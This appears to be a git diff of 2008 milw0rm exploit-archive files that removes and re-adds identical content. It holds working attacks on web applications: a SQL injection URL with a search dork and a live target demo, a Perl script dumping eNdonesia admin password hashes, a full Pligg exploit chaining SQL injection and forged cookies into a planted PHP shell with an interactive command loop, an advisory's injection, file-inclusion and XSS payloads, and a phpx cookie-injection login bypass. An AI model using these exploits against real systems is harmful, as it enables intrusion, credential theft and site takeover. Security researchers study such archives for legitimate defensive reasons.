darkangel_g85[at]Yahoo[DoT]com +| +| +|___________________________________________________ +| | +| +| +| script : http://www.pozscripts.com/product_details.php?category_id=0&item_id=3 +| +| DorK : inurl:ugroups.php?UID= +| +|___________________________________________________| + + + +Exploit: + 
+www.[target].com/Script/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15+from+signup-- + + + +L!VE DEMO: : + + +http://www.tubeguru.net/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15+from+signup-- + + + +admin login : + +www.[target].com/Script/admin2/siteadmin/index.php + +____________________________( Greetz )____________________________ +| +| tryag.cc | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | str0ke +| +| Iraqihack | FAHD | mos_chori | Silic0n +| +|_________________________________________________________________ + + + Im IRAQi + +# milw0rm.com [2008-07-30] diff --git a/platforms/php/webapps/6171.pl b/platforms/php/webapps/6171.pl index 8b38653f8..d78786ee3 100755 --- a/platforms/php/webapps/6171.pl +++ b/platforms/php/webapps/6171.pl 
@@ -1,76 +1,76 @@ -#!/usr/bin/perl -#/-----------------------------------------------\ -#| /-----------------------------------------\ | -#| | Remote SQL Exploit | | -#| | eNdonesia 8.4 Remote SQL Exploit | | -#| | www.endonesia.org | | -#| | Calendar Module | | -#| \-----------------------------------------/ | -#| /-----------------------------------------\ | -#| | Presented By Jack | | -#| | MainHack Enterprise | | -#| | www.MainHack.com & irc.nob0dy.net | | -#| | #MainHack #nob0dy #BaliemHackerlink | | -#| | Jack[at]MainHack[dot]com | | -#| \-----------------------------------------/ | -#| /-----------------------------------------\ | -#| | Hello To: Indonesian h4x0r | | -#| | yadoy666,n0c0py & okedeh | | -#| | VOP Crew [Vaksin13,OoN_BoY,Paman] | | -#| | NoGe,str0ke,H312Y,s3t4n,[S]hiro,frull | | -#| | all MainHack BrotherHood | | -#| \-----------------------------------------/ | -#\-----------------------------------------------/ - - use HTTP::Request; - use LWP::UserAgent; - - $sql_vulnerable = "/mod.php?mod=calendar&op=list_events&loc_id="; - $sql_injection = "-999/**/union+select/**/0x3a,0x3a,concat(aid,0x3a,pwd),0x3a,concat(name,0x3a,pwd)/**/from/**/authors/*where%20name%20pwd"; - - if(!@ARGV) { &help;exit(1);} - - sub help(){ - print "\n [?] eNdonesia 8.4 Remote SQL Exploit\n"; - print " [?] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n"; - print " [?] Use : perl $0 www.target.com\n"; - print " [?] Dont use \"http://\"\n"; - print " [?] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n"; - print " [?] Baliem Hacker - VOP crew - MainHack BrotherHood \n\n"; - print " [?] 
www.MainHack.com\n\n"; - } - - while (){ - my $target = $ARGV[0]; - my $exploit = "http://".$target.$sql_vulnerable.$sql_injection; - print "\n [-] Trying to inject $target ...\n\n"; - my $request = HTTP::Request->new(GET=>$exploit); - my $useragent = LWP::UserAgent->new(); - $useragent->timeout(10); - my $response = $useragent->request($request); - if ($response->is_success){ - my $res = $response->content; - if ($res =~ m/\>([0-9,a-z]{2,13}):([0-9,a-f]{32})/g) { - my ($username,$passwd) = ($1,$2); - print " [target] $target \n"; - print " [loginx] $username:$passwd \n\n"; - exit(0); - } - else { - die " [error] Fail to get username and password.\n\n"; - } - } - else { - die " [error] Fail to inject $target \n\n"; - } - } - -#/----------------------------------------------------------------\ -#| NoGay kalo kita artikan sepintas berarti Tidak ada Gay | -#| namun mari kita perhatikan secara seksama ... | -#| NoGay merupakan kependekan dari NoGe is Gay. | -#| Sungguh, penyembunyian sebuah karakter di balik makna kata. | -#\----------------------------------------------------------------/ -#Vendor Has been contacted and now working for it. 
- -# milw0rm.com [2008-07-30] +#!/usr/bin/perl +#/-----------------------------------------------\ +#| /-----------------------------------------\ | +#| | Remote SQL Exploit | | +#| | eNdonesia 8.4 Remote SQL Exploit | | +#| | www.endonesia.org | | +#| | Calendar Module | | +#| \-----------------------------------------/ | +#| /-----------------------------------------\ | +#| | Presented By Jack | | +#| | MainHack Enterprise | | +#| | www.MainHack.com & irc.nob0dy.net | | +#| | #MainHack #nob0dy #BaliemHackerlink | | +#| | Jack[at]MainHack[dot]com | | +#| \-----------------------------------------/ | +#| /-----------------------------------------\ | +#| | Hello To: Indonesian h4x0r | | +#| | yadoy666,n0c0py & okedeh | | +#| | VOP Crew [Vaksin13,OoN_BoY,Paman] | | +#| | NoGe,str0ke,H312Y,s3t4n,[S]hiro,frull | | +#| | all MainHack BrotherHood | | +#| \-----------------------------------------/ | +#\-----------------------------------------------/ + + use HTTP::Request; + use LWP::UserAgent; + + $sql_vulnerable = "/mod.php?mod=calendar&op=list_events&loc_id="; + $sql_injection = "-999/**/union+select/**/0x3a,0x3a,concat(aid,0x3a,pwd),0x3a,concat(name,0x3a,pwd)/**/from/**/authors/*where%20name%20pwd"; + + if(!@ARGV) { &help;exit(1);} + + sub help(){ + print "\n [?] eNdonesia 8.4 Remote SQL Exploit\n"; + print " [?] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n"; + print " [?] Use : perl $0 www.target.com\n"; + print " [?] Dont use \"http://\"\n"; + print " [?] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n"; + print " [?] Baliem Hacker - VOP crew - MainHack BrotherHood \n\n"; + print " [?] 
www.MainHack.com\n\n"; + } + + while (){ + my $target = $ARGV[0]; + my $exploit = "http://".$target.$sql_vulnerable.$sql_injection; + print "\n [-] Trying to inject $target ...\n\n"; + my $request = HTTP::Request->new(GET=>$exploit); + my $useragent = LWP::UserAgent->new(); + $useragent->timeout(10); + my $response = $useragent->request($request); + if ($response->is_success){ + my $res = $response->content; + if ($res =~ m/\>([0-9,a-z]{2,13}):([0-9,a-f]{32})/g) { + my ($username,$passwd) = ($1,$2); + print " [target] $target \n"; + print " [loginx] $username:$passwd \n\n"; + exit(0); + } + else { + die " [error] Fail to get username and password.\n\n"; + } + } + else { + die " [error] Fail to inject $target \n\n"; + } + } + +#/----------------------------------------------------------------\ +#| NoGay kalo kita artikan sepintas berarti Tidak ada Gay | +#| namun mari kita perhatikan secara seksama ... | +#| NoGay merupakan kependekan dari NoGe is Gay. | +#| Sungguh, penyembunyian sebuah karakter di balik makna kata. | +#\----------------------------------------------------------------/ +#Vendor Has been contacted and now working for it. + +# milw0rm.com [2008-07-30] diff --git a/platforms/php/webapps/6172.pl b/platforms/php/webapps/6172.pl index 81105ca32..0041d2d4f 100755 --- a/platforms/php/webapps/6172.pl +++ b/platforms/php/webapps/6172.pl 
@@ -1,204 +1,204 @@ -#!/usr/bin/perl -w -use LWP::UserAgent; -use MIME::Base64; -use Digest::MD5 qw(md5_hex); -use Getopt::Std; getopts('h:', \%args); - -print "#############################################\n"; -print "# Pligg <= 9.9 Remote Code Execution Exploit \n"; -print "#############################################\n"; -#dork = "Powered By Pligg" + "Legal: License and Source" - -# Proxy address -$ENV{http_proxy} = 'http://127.0.0.1:8118/'; - -my $http = LWP::UserAgent->new; - $http->agent('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'); - #$http->env_proxy(); # <-- uncomment for proxy - $http->cookie_jar({}); - -my $host = $args{'h'} || usage(); # Host flag. Specify the Pligg root directory -my $user = undef; -my $pass = undef; -my $file = undef; -my $data = undef; -my @auth = undef; - -# Details for the php code that is injected in to the template -my $ereg = '(.*?)<\/cmdout>'; -my $cvar = 'cmd'; -my $cval = 'pwd;id'; -my $code = ''; - -print "[*] Checking if a shell already exists ...\n"; - -$data = $http->post( -$host . '/index.php', -[ - $cvar => $cval -]); - -if ( $data->content =~ /$ereg/si ) -{ - print "[*] Found existing shell ...\n"; -} -else -{ - print "[!] No existing shell found ...\n"; - - ############################################# - # Gather user info via vote.php SQL Injection - ############################################# - - $data = $http->post( - $host . '/vote.php', - [ - 'id' => '-99 UNION SELECT 1,2,3,null,5,6,concat(user_login,char(58),user_pass),8,9 FROM pligg_users -- /*', - 'md5' => 'd41d8cd98f00b204e9800998ecf8427e' # <-- If you aren't logged in this always works - ]); - - print "[*] Gathering user information ...\n"; - - if ( $data->content =~ /(.*?):([a-f0-9]{1,64})/i ) - { - $user = $1; - $pass = $2; - - # Sets up the cookie to authenticate us - @auth = ('Cookie' => 'mnm_user=' . $user . '; mnm_key=' . encode_base64($user . ':' . crypt($user, 22) . ':' . md5_hex($pass)) . 
';'); - - print "[+] Got user '$user' ...\n"; - - } - else - { - print "[!] Unable to get user info. Dumping output ...\n"; - open(ELOG, '>pligg_debug.html');print ELOG $data->content;close(ELOG); - exit; - } - - ############################################# - # Get the template path - ############################################# - - print "[*] Gathering template information ...\n"; - - $data = $http->get($host . '/admin_editor.php',@auth); - - if ( $data->content =~ />(.*?)<\/option>/i ) - { - $file = $1; - # Quick and dirty fix - $file =~ s/admin_templates\/admin_access_denied.tpl/footer.tpl/; - print "[+] Got template file [$file]...\n"; - } - - ############################################# - # Read the template contents - ############################################# - - $data = $http->post( - $host . '/admin_editor.php', - [ - 'the_file' => $file, - 'open' => 'Open' - ] - ,@auth); - - print "[*] Reading template data ...\n"; - - # Grab the template contents - if ( $data->content =~ /(.*)<\/textarea>/is ) - { - $temp = $2; - $temp =~ s/>/>/ig; - $temp =~ s/</pligg_debug.html');print ELOG $data->content;close(ELOG); - exit; - } - - ############################################# - # Update the Template Contents - ############################################# - - - $data = $http->post( - $host . '/admin_editor.php', - [ - 'the_file2' => $file, - 'updatedfile' => $temp . $code, - 'save' => 'Save+Changes' - ] - ,@auth); - - print "[*] Updating template data ...\n"; - - if ( $data->content =~ /File Saved/is ) - { - print "[+] File saved!\n"; - } - else - { - print "[!] Unable to update template data. Dumping output ...\n"; - open(ELOG, '>pligg_debug.html');print ELOG $data->content;close(ELOG); - exit; - } -} - -############################################# -# Setting up the php shell -############################################# - -print "[*] Setting up shell ...\n"; - -$data = $http->post( -$host . 
'/index.php', -[ - $cvar => $cval -]); - -if ( $data->content =~ /(.*?)<\/cmdout>/si ) -{ - while ( 1 ) - { - print "pligg:~#"; - $exec = ; - - $data = $http->post( - $host . '/index.php', - [ - $cvar => $exec - ]); - - if ( $data->content =~ /$ereg/si ) - { - print $1 . "\n"; - } - else - { - print "Unexpected Response!\n"; - } - } -} -else -{ - print "[!] Unable to set up shell ...\n"; - open(ELOG, '>pligg_debug.html');print ELOG $data->content;close(ELOG); - exit; -} - -sub usage -{ - print "pligg_exploit.pl -h http://path/to/pligg \n"; - exit; -} - -# milw0rm.com [2008-07-30] +#!/usr/bin/perl -w +use LWP::UserAgent; +use MIME::Base64; +use Digest::MD5 qw(md5_hex); +use Getopt::Std; getopts('h:', \%args); + +print "#############################################\n"; +print "# Pligg <= 9.9 Remote Code Execution Exploit \n"; +print "#############################################\n"; +#dork = "Powered By Pligg" + "Legal: License and Source" + +# Proxy address +$ENV{http_proxy} = 'http://127.0.0.1:8118/'; + +my $http = LWP::UserAgent->new; + $http->agent('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'); + #$http->env_proxy(); # <-- uncomment for proxy + $http->cookie_jar({}); + +my $host = $args{'h'} || usage(); # Host flag. Specify the Pligg root directory +my $user = undef; +my $pass = undef; +my $file = undef; +my $data = undef; +my @auth = undef; + +# Details for the php code that is injected in to the template +my $ereg = '(.*?)<\/cmdout>'; +my $cvar = 'cmd'; +my $cval = 'pwd;id'; +my $code = ''; + +print "[*] Checking if a shell already exists ...\n"; + +$data = $http->post( +$host . '/index.php', +[ + $cvar => $cval +]); + +if ( $data->content =~ /$ereg/si ) +{ + print "[*] Found existing shell ...\n"; +} +else +{ + print "[!] 
No existing shell found ...\n"; + + ############################################# + # Gather user info via vote.php SQL Injection + ############################################# + + $data = $http->post( + $host . '/vote.php', + [ + 'id' => '-99 UNION SELECT 1,2,3,null,5,6,concat(user_login,char(58),user_pass),8,9 FROM pligg_users -- /*', + 'md5' => 'd41d8cd98f00b204e9800998ecf8427e' # <-- If you aren't logged in this always works + ]); + + print "[*] Gathering user information ...\n"; + + if ( $data->content =~ /(.*?):([a-f0-9]{1,64})/i ) + { + $user = $1; + $pass = $2; + + # Sets up the cookie to authenticate us + @auth = ('Cookie' => 'mnm_user=' . $user . '; mnm_key=' . encode_base64($user . ':' . crypt($user, 22) . ':' . md5_hex($pass)) . ';'); + + print "[+] Got user '$user' ...\n"; + + } + else + { + print "[!] Unable to get user info. Dumping output ...\n"; + open(ELOG, '>pligg_debug.html');print ELOG $data->content;close(ELOG); + exit; + } + + ############################################# + # Get the template path + ############################################# + + print "[*] Gathering template information ...\n"; + + $data = $http->get($host . '/admin_editor.php',@auth); + + if ( $data->content =~ />(.*?)<\/option>/i ) + { + $file = $1; + # Quick and dirty fix + $file =~ s/admin_templates\/admin_access_denied.tpl/footer.tpl/; + print "[+] Got template file [$file]...\n"; + } + + ############################################# + # Read the template contents + ############################################# + + $data = $http->post( + $host . 
'/admin_editor.php', + [ + 'the_file' => $file, + 'open' => 'Open' + ] + ,@auth); + + print "[*] Reading template data ...\n"; + + # Grab the template contents + if ( $data->content =~ /(.*)<\/textarea>/is ) + { + $temp = $2; + $temp =~ s/>/>/ig; + $temp =~ s/</pligg_debug.html');print ELOG $data->content;close(ELOG); + exit; + } + + ############################################# + # Update the Template Contents + ############################################# + + + $data = $http->post( + $host . '/admin_editor.php', + [ + 'the_file2' => $file, + 'updatedfile' => $temp . $code, + 'save' => 'Save+Changes' + ] + ,@auth); + + print "[*] Updating template data ...\n"; + + if ( $data->content =~ /File Saved/is ) + { + print "[+] File saved!\n"; + } + else + { + print "[!] Unable to update template data. Dumping output ...\n"; + open(ELOG, '>pligg_debug.html');print ELOG $data->content;close(ELOG); + exit; + } +} + +############################################# +# Setting up the php shell +############################################# + +print "[*] Setting up shell ...\n"; + +$data = $http->post( +$host . '/index.php', +[ + $cvar => $cval +]); + +if ( $data->content =~ /(.*?)<\/cmdout>/si ) +{ + while ( 1 ) + { + print "pligg:~#"; + $exec = ; + + $data = $http->post( + $host . '/index.php', + [ + $cvar => $exec + ]); + + if ( $data->content =~ /$ereg/si ) + { + print $1 . "\n"; + } + else + { + print "Unexpected Response!\n"; + } + } +} +else +{ + print "[!] Unable to set up shell ...\n"; + open(ELOG, '>pligg_debug.html');print ELOG $data->content;close(ELOG); + exit; +} + +sub usage +{ + print "pligg_exploit.pl -h http://path/to/pligg \n"; + exit; +} + +# milw0rm.com [2008-07-30] diff --git a/platforms/php/webapps/6173.txt b/platforms/php/webapps/6173.txt index 25d1fa05a..5f7111f88 100755 --- a/platforms/php/webapps/6173.txt +++ b/platforms/php/webapps/6173.txt 
@@ -1,186 +1,186 @@ -########################################################## -# GulfTech Security Research July 30, 2008 -########################################################## -# Vendor : Pligg LLC -# URL : http://www.pligg.com/ -# Version : Pligg <= 9.9 -# Risk : Multiple Vulnerabilities -########################################################## - - -Description: -Pligg is a popular open source, full featured, content management -system written in php. There are a number of vulnerabilities -within Pligg that allow for remote file enumeration, file inclusion, -cross site scripting, and sql injection. When combined these issues -allow for remote code execution on the affected installation -via arbitrary php code placed within template files once admin -credentials are gained via SQL Injection. - - - -Cross Site Scripting: -There are Cross Site Scripting issues in Pligg that allow for -theft of client side credentials such as cookies. An example -can be found in user.php. If the "view" parameter is set to -"search" then the "keyword" parameter can be influenced. This -is a result of un sanitized GPC variables being issued directly -to smarty via the assign function. - -/user.php?view=search&keyword= - -The above example link would display the end users cookie to -them. Of course this can also be used to steal the cookie data -as mentioned earlier in this advisory. - - - -Arbitrary File Access: -A number of file access issues exist in Pligg. They range from -the not so severe (such as arbitrary file enumeration) to the -much more severe (arbitrary file inclusion). 
In regards to the -arbitrary file enumeration a good example of it can be found in -trackback.php @ line 76 - -$contents=@file_get_contents($tb_url); -if(!$contents) -trackback_response(1, $main_smarty->get_config_vars('PLIGG_Visual_Trackback_BadURL')); - -The $tb_url variable gets it's value directly from a post variable -as seen @ line 36, so, we can see how this can be easily used to -enumerate the existence of files on the web server both inside and -outside of the web accessible directories. If the file exists we will -get the "PLIGG_Visual_Trackback_BadURL" error. In addition to this -issue, an attacker may also include arbitrary files via a malformed -template request. Both template and language data within Pligg are -accepted via cookie input and are used in file handling operations -with no sanitation. The vulnerable code in question can be found in -config.php @ lines 65-68. - -/settemplate.php?template=../LICENSE.txt%00 - -An easy way to see this issue in action is to set the malformed -"template" value via Pligg's settemplate.php script as seen above. -The above example will successfully include the LICENSE.txt file -that ships with the application by default. - - - -SQL Injection: -There are a substantial number of SQL Injection issues within Pligg -that allow for an attacker to read any data from the underlying -database including user credentials. The first file we are going to -look at is vote.php - -$link = new Link; -$link->id=$_POST['id']; -$link->read_basic(); - -The above code can be found @ lines 19-21 and shows Pligg setting the -internal class variable "id" with data from the $_POST super global. 
-Now let's have a look at the read_basic() function within the Link -class to see what exactly is being done with "id" - - -// check to see if the link is cached -// if it is, use it -// if not, get from mysql and save to cache - -if (isset($cached_links[$id]) && $usecache == TRUE) { - $link = $cached_links[$id]; -} else { - $link = $db->get_row("SELECT " . table_links . ".* FROM " . - table_links . " WHERE link_id = $id"); - $cached_links[$id] = $link; -} - - -As you can see in the above code taken from /libs/link.php @ lines -200-209 the "id" variable is never sanitized before being used in a -query. The result is a highly exploitable SQL Injection vulnerability. - -md5=d41d8cd98f00b204e9800998ecf8427e&id=-99 UNION SELECT 1,2,3,null,5, -6,concat(user_login,char(58),user_pass),8,9 FROM pligg_users -- /* - -By sending a post request to vote.php with the above data an attacker -can successfully expose user credentials. Still, there are more SQL -Injection issues in Pligg, and next we will have a look at trackback.php - -$trackres = new Trackback; -$trackres->link=$tb_id; -$trackres->type='in'; -$trackres->url = $tb_url; -$dupe = $trackres->read(); - -The above code comes from trackback.php @ lines 68-72, and like the -issue we previously discussed in regards to vote.php also sends -unsanitized gpc data to an internal class variable (in this case -$trackres->link) where it is used in an SQL Query without ever being -sanitized. - -/trackback.php?id=007 UNION SELECT 1,2,3,4,5,6,7,8,9,10 FROM pligg_users -WHERE user_id=1 AND MID(user_pass,1,1)=concat(char(97)) -- /* - -A request like the one above made with the post method to trackback.php -and having the post contents of "url=1&title=1&blog_name=1" can be used -to successfully enumerate database contents. In the example above Pligg -would return a "We already have a ping from that URL for this post." -error if the first character of the first user's password is "a". 
Next -let's have a look at submit.php @ lines 320-321 and you will see another -SQL Injection issue very similar to these first two that I have discussed. -Another SQL Injection issue can be found in story.php @ lines 45 where -the "requestTitle" variable is used in a query with no sanitation. -Another SQL Injection issue can be found in recommend.php @ lines 19-25. -The SQL Injection issues in recommend.php are possible through both the -"requestID" and the "requestTitle" variables. Another SQL Injection issue -can be found in cloud.php @ lines 35-36 via the categoryID parameter. -Another SQL Injection issue can be found within out.php and is not much -different from the previously discussed SQL Injection issues in Pligg. - -/out.php?title=-99%27 UNION SELECT 1 FROM pligg_users WHERE user_id=1 AND -MID(user_pass,1,1)=concat(char(97))/* - -The above url will allow an attacker to enumerate database data as -discussed earlier, and eventually gain admin credentials. Due to the large -number of SQL Injection issues in Pligg I will identify the remaining -issues with some simple examples of exploitation. 
- ----[ login.php ]------------------------------------------------ -/* Post Request */ -processlogin=3&username=-99' UNION SELECT 1,2,3,4,5,6,null,8,9,10,11,12,13,14, -15,16,17,18,19,20,21,22,23,24,25,26 FROM pligg_users WHERE user_id=1/* - -/* Get Request */ -/login.php?processlogin=4&username=-99' UNION SELECT 1 FROM pligg_users -WHERE user_id=1/*&confirmationcode=1 - ----[ cvote.php ]------------------------------------------------ -/* Post Request */ -id=-99 UNION SELECT 1,null,3,4,5,6,7,8,9 FROM pligg_users/* -&md5=d41d8cd98f00b204e9800998ecf8427e - ----[ edit.php ]------------------------------------------------- -/* Get Request */ -/edit.php?id=1&commentid=-99 UNION SELECT 1 FROM pligg_users WHERE -user_id=1 AND MID(user_pass,1,1)=concat(char(49))/* - - - -Solution: -The Pligg developers are aware of the issues mentioned in this advisory -and an updated version of Pligg should be available from their website. -All users are encouraged to upgrade their Pligg installations as soon -as possible. - - - -Credits: -James Bercegay of the GulfTech Security Research Team - - - -Related Info: -The original advisory can be found at the following location -http://www.gulftech.org/?node=research&article_id=00120-07312008 - -# milw0rm.com [2008-07-30] +########################################################## +# GulfTech Security Research July 30, 2008 +########################################################## +# Vendor : Pligg LLC +# URL : http://www.pligg.com/ +# Version : Pligg <= 9.9 +# Risk : Multiple Vulnerabilities +########################################################## + + +Description: +Pligg is a popular open source, full featured, content management +system written in php. There are a number of vulnerabilities +within Pligg that allow for remote file enumeration, file inclusion, +cross site scripting, and sql injection. 
When combined these issues +allow for remote code execution on the affected installation +via arbitrary php code placed within template files once admin +credentials are gained via SQL Injection. + + + +Cross Site Scripting: +There are Cross Site Scripting issues in Pligg that allow for +theft of client side credentials such as cookies. An example +can be found in user.php. If the "view" parameter is set to +"search" then the "keyword" parameter can be influenced. This +is a result of un sanitized GPC variables being issued directly +to smarty via the assign function. + +/user.php?view=search&keyword= + +The above example link would display the end users cookie to +them. Of course this can also be used to steal the cookie data +as mentioned earlier in this advisory. + + + +Arbitrary File Access: +A number of file access issues exist in Pligg. They range from +the not so severe (such as arbitrary file enumeration) to the +much more severe (arbitrary file inclusion). In regards to the +arbitrary file enumeration a good example of it can be found in +trackback.php @ line 76 + +$contents=@file_get_contents($tb_url); +if(!$contents) +trackback_response(1, $main_smarty->get_config_vars('PLIGG_Visual_Trackback_BadURL')); + +The $tb_url variable gets it's value directly from a post variable +as seen @ line 36, so, we can see how this can be easily used to +enumerate the existence of files on the web server both inside and +outside of the web accessible directories. If the file exists we will +get the "PLIGG_Visual_Trackback_BadURL" error. In addition to this +issue, an attacker may also include arbitrary files via a malformed +template request. Both template and language data within Pligg are +accepted via cookie input and are used in file handling operations +with no sanitation. The vulnerable code in question can be found in +config.php @ lines 65-68. 
+ +/settemplate.php?template=../LICENSE.txt%00 + +An easy way to see this issue in action is to set the malformed +"template" value via Pligg's settemplate.php script as seen above. +The above example will successfully include the LICENSE.txt file +that ships with the application by default. + + + +SQL Injection: +There are a substantial number of SQL Injection issues within Pligg +that allow for an attacker to read any data from the underlying +database including user credentials. The first file we are going to +look at is vote.php + +$link = new Link; +$link->id=$_POST['id']; +$link->read_basic(); + +The above code can be found @ lines 19-21 and shows Pligg setting the +internal class variable "id" with data from the $_POST super global. +Now let's have a look at the read_basic() function within the Link +class to see what exactly is being done with "id" + + +// check to see if the link is cached +// if it is, use it +// if not, get from mysql and save to cache + +if (isset($cached_links[$id]) && $usecache == TRUE) { + $link = $cached_links[$id]; +} else { + $link = $db->get_row("SELECT " . table_links . ".* FROM " . + table_links . " WHERE link_id = $id"); + $cached_links[$id] = $link; +} + + +As you can see in the above code taken from /libs/link.php @ lines +200-209 the "id" variable is never sanitized before being used in a +query. The result is a highly exploitable SQL Injection vulnerability. + +md5=d41d8cd98f00b204e9800998ecf8427e&id=-99 UNION SELECT 1,2,3,null,5, +6,concat(user_login,char(58),user_pass),8,9 FROM pligg_users -- /* + +By sending a post request to vote.php with the above data an attacker +can successfully expose user credentials. 
Still, there are more SQL +Injection issues in Pligg, and next we will have a look at trackback.php + +$trackres = new Trackback; +$trackres->link=$tb_id; +$trackres->type='in'; +$trackres->url = $tb_url; +$dupe = $trackres->read(); + +The above code comes from trackback.php @ lines 68-72, and like the +issue we previously discussed in regards to vote.php also sends +unsanitized gpc data to an internal class variable (in this case +$trackres->link) where it is used in an SQL Query without ever being +sanitized. + +/trackback.php?id=007 UNION SELECT 1,2,3,4,5,6,7,8,9,10 FROM pligg_users +WHERE user_id=1 AND MID(user_pass,1,1)=concat(char(97)) -- /* + +A request like the one above made with the post method to trackback.php +and having the post contents of "url=1&title=1&blog_name=1" can be used +to successfully enumerate database contents. In the example above Pligg +would return a "We already have a ping from that URL for this post." +error if the first character of the first user's password is "a". Next +let's have a look at submit.php @ lines 320-321 and you will see another +SQL Injection issue very similar to these first two that I have discussed. +Another SQL Injection issue can be found in story.php @ lines 45 where +the "requestTitle" variable is used in a query with no sanitation. +Another SQL Injection issue can be found in recommend.php @ lines 19-25. +The SQL Injection issues in recommend.php are possible through both the +"requestID" and the "requestTitle" variables. Another SQL Injection issue +can be found in cloud.php @ lines 35-36 via the categoryID parameter. +Another SQL Injection issue can be found within out.php and is not much +different from the previously discussed SQL Injection issues in Pligg. + +/out.php?title=-99%27 UNION SELECT 1 FROM pligg_users WHERE user_id=1 AND +MID(user_pass,1,1)=concat(char(97))/* + +The above url will allow an attacker to enumerate database data as +discussed earlier, and eventually gain admin credentials. 
Due to the large +number of SQL Injection issues in Pligg I will identify the remaining +issues with some simple examples of exploitation. + +---[ login.php ]------------------------------------------------ +/* Post Request */ +processlogin=3&username=-99' UNION SELECT 1,2,3,4,5,6,null,8,9,10,11,12,13,14, +15,16,17,18,19,20,21,22,23,24,25,26 FROM pligg_users WHERE user_id=1/* + +/* Get Request */ +/login.php?processlogin=4&username=-99' UNION SELECT 1 FROM pligg_users +WHERE user_id=1/*&confirmationcode=1 + +---[ cvote.php ]------------------------------------------------ +/* Post Request */ +id=-99 UNION SELECT 1,null,3,4,5,6,7,8,9 FROM pligg_users/* +&md5=d41d8cd98f00b204e9800998ecf8427e + +---[ edit.php ]------------------------------------------------- +/* Get Request */ +/edit.php?id=1&commentid=-99 UNION SELECT 1 FROM pligg_users WHERE +user_id=1 AND MID(user_pass,1,1)=concat(char(49))/* + + + +Solution: +The Pligg developers are aware of the issues mentioned in this advisory +and an updated version of Pligg should be available from their website. +All users are encouraged to upgrade their Pligg installations as soon +as possible. + + + +Credits: +James Bercegay of the GulfTech Security Research Team + + + +Related Info: +The original advisory can be found at the following location +http://www.gulftech.org/?node=research&article_id=00120-07312008 + +# milw0rm.com [2008-07-30] diff --git a/platforms/php/webapps/6176.txt b/platforms/php/webapps/6176.txt index fdc4c2665..6826beaab 100755 --- a/platforms/php/webapps/6176.txt +++ b/platforms/php/webapps/6176.txt 
@@ -1,106 +1,106 @@ -======================================================================= - - = gnix = - - gnixmail at gmail dot com - http://gnix.netsons.org - - -Application: phpx - http://www.phpx.org/project.php (stable version) -Versions: 3.5.16 -Platforms: All -Bug: Cookie poisoning / Login bypass -Date: 31 July 2008 - - - -======================================================================= - - 1. Intro - 2. Cookie poisoning and login bypass - - - -======================================================================= - - 1. Intro - ======== - -PHPX is a web portal system, blog,Content Management System (CMS), forums, -and more. All files are currently hosted at http://www.phpx.org/project.php - - - -======================================================================= - - 2. Cookie poisoning and login bypass - ==================================== - -Every file in phpx-3.5.16/ directory have two lines of code: one for -include includes/functions.inc.php, and another to create a website object. -website's constructor will call checkCookie. - - - Source code (includes/functions.inc.php) - --------------------------------------------------------------------- - class website { - ... - - function website(){ - ... - - $this->checkCookie(); - --------------------------------------------------------------------- - - -The function checkCookie set the user_id if PXL cookie is set and the -query return an user_id, and an username. - - - Vulnerable code (includes/functions.inc.php lines 75 to 89) - --------------------------------------------------------------------- - function checkCookie(){ - - if ($_COOKIE[PXL]){ - list($user_id, $username) = $this->core->db->fetch("select user_id, username from users where sess = '$_COOKIE[PXL]'"); - if (!$user_id){ - setcookie("PXL", '', time() - 60, '', '', $this->core->secure); - $head = "Location: http://" . $_SERVER["HTTP_HOST"] . 
$_SERVER["REQUEST_URI"]; - header($head); - } - else { - if (strtolower($username) == "xnuiem"){ $this->debug = 1; } - $this->user_id = $user_id; - } - } - } - --------------------------------------------------------------------- - - -This user_id is then used in the website constructor for set the user_id -of the core class. - - - Source code (includes/functions.inc.php line 32) - --------------------------------------------------------------------- - $this->core->user_id = $this->user_id; - --------------------------------------------------------------------- - - -Now if you want to get the admin privileges and by pass the login, you -have to create a cookie like this below: - - - --------------------------------------------------------------------- - PXL=a' OR username='admin - --------------------------------------------------------------------- - - -To do that you can use 'Modify Headers'. - - - -======================================================================= - -# milw0rm.com [2008-07-31] +======================================================================= + + = gnix = + + gnixmail at gmail dot com + http://gnix.netsons.org + + +Application: phpx + http://www.phpx.org/project.php (stable version) +Versions: 3.5.16 +Platforms: All +Bug: Cookie poisoning / Login bypass +Date: 31 July 2008 + + + +======================================================================= + + 1. Intro + 2. Cookie poisoning and login bypass + + + +======================================================================= + + 1. Intro + ======== + +PHPX is a web portal system, blog,Content Management System (CMS), forums, +and more. All files are currently hosted at http://www.phpx.org/project.php + + + +======================================================================= + + 2. 
Cookie poisoning and login bypass + ==================================== + +Every file in phpx-3.5.16/ directory have two lines of code: one for +include includes/functions.inc.php, and another to create a website object. +website's constructor will call checkCookie. + + + Source code (includes/functions.inc.php) + --------------------------------------------------------------------- + class website { + ... + + function website(){ + ... + + $this->checkCookie(); + --------------------------------------------------------------------- + + +The function checkCookie set the user_id if PXL cookie is set and the +query return an user_id, and an username. + + + Vulnerable code (includes/functions.inc.php lines 75 to 89) + --------------------------------------------------------------------- + function checkCookie(){ + + if ($_COOKIE[PXL]){ + list($user_id, $username) = $this->core->db->fetch("select user_id, username from users where sess = '$_COOKIE[PXL]'"); + if (!$user_id){ + setcookie("PXL", '', time() - 60, '', '', $this->core->secure); + $head = "Location: http://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]; + header($head); + } + else { + if (strtolower($username) == "xnuiem"){ $this->debug = 1; } + $this->user_id = $user_id; + } + } + } + --------------------------------------------------------------------- + + +This user_id is then used in the website constructor for set the user_id +of the core class. 
